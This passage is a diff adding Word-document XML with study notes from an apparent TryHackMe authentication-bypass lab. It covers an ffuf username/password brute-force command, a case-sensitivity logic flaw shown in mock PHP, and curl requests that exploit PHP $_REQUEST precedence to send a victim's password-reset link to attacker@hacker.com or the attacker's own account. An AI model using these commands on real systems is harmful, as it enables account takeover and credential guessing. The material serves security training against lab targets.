+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:W2 -X POST -d "username=W1&amp;password=W2" -H "Content-Type: application/x-www-form-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>urlencoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>" -u http://10.10.238.42/customers/login -fc 200</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">This </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ffuf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> command is a little different to the previous one in Task 2. Previously we used the FUZZ keyword to select where in the request the data from the wordlists would be inserted, but because we're using multiple wordlists, we have to specify our own FUZZ keyword. In this instance, we've chosen W1 for our list of valid usernames and W2 for the list of passwords we will try. The multiple wordlists are again specified with the -w argument but separated with a comma.  For a positive match, we're using the -fc argument to check for an HTTP status code other than 200.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Running the above command will find a single working username and password combination that answers the question below.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>d</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
+          <w:color w:val="F9F9FB"/>
+          <w:highlight w:val="magenta"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="212C42"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>Logic Flaw</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>What is a Logic Flaw?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Sometimes authentication processes contain logic flaws. A logic flaw is when the typical logical path of an application is either bypassed, circumvented or manipulated by a hacker. Logic flaws can exist in any area of a website, but we're going to concentrate on examples relating to authentication in this instance.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D60AE29" wp14:editId="76B28F12">
+            <wp:extent cx="5346700" cy="2857500"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="1231964536" name="Picture 71"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 263"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId54">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5346700" cy="2857500"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Logic Flaw Example</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>The below mock code example checks to see whether the start of the path the client is visiting begins with /admin and if so, then further checks are made to see whether the client is, in fact, an admin. If the page doesn't begin with /admin, the page is shown to the client.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">if( </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>substr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>0,6) === '/admin') {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">    # Code to check user is an admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>} else {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">    # View Page</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Because the above PHP code example uses three equals signs (===), it's looking for an exact match on the string, including the same letter casing. The code presents a logic flaw because an unauthenticated user requesting /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>adMin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t> will not have their privileges checked and have the page displayed to them, totally bypassing the authentication checks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Logic Flaw Practical</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>We're going to examine the Reset Password function of the Acme IT Support website (</w:t>
+      </w:r>
+      <w:hyperlink r:id="rId55" w:tgtFrame="_blank" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:b/>
+            <w:bCs/>
+          </w:rPr>
+          <w:t>http://10.10.238.42/customers/reset</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>). We see a form asking for the email address associated with the account on which we wish to perform the password reset. If an invalid email is entered, you'll receive the error message "Account not found from supplied email address".</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">For demonstration purposes, we'll use the email address </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>robert@acmeitsupport.thm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> which is accepted. We're then presented with the next stage of the form, which asks for the username associated with this login email address. If we enter </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>robert</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> as the username and press the Check Username button, you'll be presented with a confirmation message that a password reset email will be sent to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>robert@acmeitsupport.thm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="110638EF" wp14:editId="2946B235">
+            <wp:extent cx="4356100" cy="2095500"/>
+            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
+            <wp:docPr id="2129590656" name="Picture 70"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 264"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId56">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4356100" cy="2095500"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>At this stage, you may be wondering what the vulnerability could be in this application as you have to know both the email and username and then the password link is sent to the email address of the account owner.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">This walkthrough will require running both of the below Curl Requests on the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>AttackBox</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> which can be opened by using the Blue Button Above.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>In the second step of the reset email process, the username is submitted in a POST field to the web server, and the email address is sent in the query string request as a GET field.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Let's illustrate this by using the curl tool to manually make the request to the webserver.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Curl Request 1:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>user@tryhackme</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ curl 'http://10.10.238.42/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>urlencoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>' -d 'username=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>robert</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>We use the -H flag to add an additional header to the request. In this instance, we are setting the Content-Type to application/x-www-form-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>urlencoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>, which lets the web server know we are sending form data so it properly understands our request.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>In the application, the user account is retrieved using the query string, but later on, in the application logic, the password reset email is sent using the data found in the PHP variable $_REQUEST.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">The PHP $_REQUEST variable is an array that contains data received from the query string and POST data. If the same key name is used for both the query string and POST data, the application logic for </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">this variable </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>favours</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> POST data fields rather than the query string, so if we add another parameter to the POST form, we can control where the password reset email gets delivered.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Curl Request 2:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>user@tryhackme</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ curl 'http://10.10.238.42/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>urlencoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>' -d 'username=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>robert&amp;email</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>=attacker@hacker.com'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36C2DABA" wp14:editId="367A6816">
+            <wp:extent cx="4019550" cy="2178050"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="282126044" name="Picture 69"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 265"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId57">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4019550" cy="2178050"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>For the next step, you'll need to create an account on the Acme IT support customer section, doing so gives you a unique email address that can be used to create support tickets. The email address is in the format of {username}@customer.acmeitsupport.thm</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Now rerunning Curl Request 2 but with your @acmeitsupport.thm in the email field you'll have a ticket created on your account which contains a link to log you in as Robert. Using Robert's account, you can view their support tickets and reveal a flag.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Curl Request 2 (but using your @acmeitsupport.thm account):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>user@</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>tryhackme</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>:~</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>$ curl 'http://10.10.238.42/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>urlencoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>' -d 'username=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>robert&amp;email</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>={username}@customer.acmeitsupport.thm'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>e-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:highlight w:val="magenta"/>
+        </w:rPr>
+        <w:t>Cookie Tampering</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
